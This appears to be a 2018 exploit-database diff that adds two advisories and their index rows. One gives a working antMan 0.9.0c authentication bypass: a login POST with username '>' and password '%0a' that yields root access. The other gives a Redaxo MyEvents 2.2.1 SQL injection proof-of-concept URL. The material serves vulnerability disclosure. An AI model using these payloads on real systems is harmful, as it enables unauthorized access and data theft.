DB: 2018-03-08

2 changes to exploits/shellcodes

Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection
antMan 0.9.0c - Authentication Bypass

exploits/java/webapps/44262.txt

@@ -0,0 +1,39 @@
+# Exploit Title: antMan <= 0.9.0c Authentication Bypass
+# Date: 02-27-2018
+# Software Link: https://www.antsle.com
+# Version: <= 0.9.0c
+# Tested on: 0.9.0c
+# Exploit Author: Joshua Bowser
+# Contact: joshua.bowser@codecatoctin.com
+# Website: http://www.codecatoctin.com
+# Category: web apps
+ 
+1. Description
+   
+antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
+ 
+http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
+ 
+   
+2. Proof of Concept
+ 
+The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Java’s ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
+
+This script contains two critical defects that allow an attacker to bypass the authentication checks.  By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
+
+To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
+
+#-------------------------
+POST /login HTTP/1.1
+Host: 10.1.1.7:3000
+[snip]
+
+username= > &password=%0a
+#-------------------------
+
+You will now be successfully authenticated to antMan as the administrative root user.
+ 
+   
+3. Solution:
+   
+Update to version 0.9.1a

exploits/php/webapps/44261.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Redaxo CMS Addon MyEvents SQL Injection [ Backend ]
+# Date: 01.03.2018
+# Exploit Author: h0n1gsp3cht
+# Vendor Homepage: http://www.github.com/wende60/myevents
+# Version: 2.2.1 (Last Version)
+# Tested on: LinuxMint
+# More: Login Required
+# GET
+
+##############
+Vuln Code [+] redaxo/src/addons/myevents/pages/event_add.php
+##############
+
+$myevents_id            =  strip_tags(rex_request('myevents_id', 'string'));
+
+###############
+POC
+###############
+
+http://127.0.0.1/redaxo/index.php?page=myevents/event_add&myevents_id=[SQL]

files_exploits.csv

@@ -38970,3 +38970,5 @@ id,file,description,date,author,type,platform,port
 44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
 44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
 44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
+44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
+44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000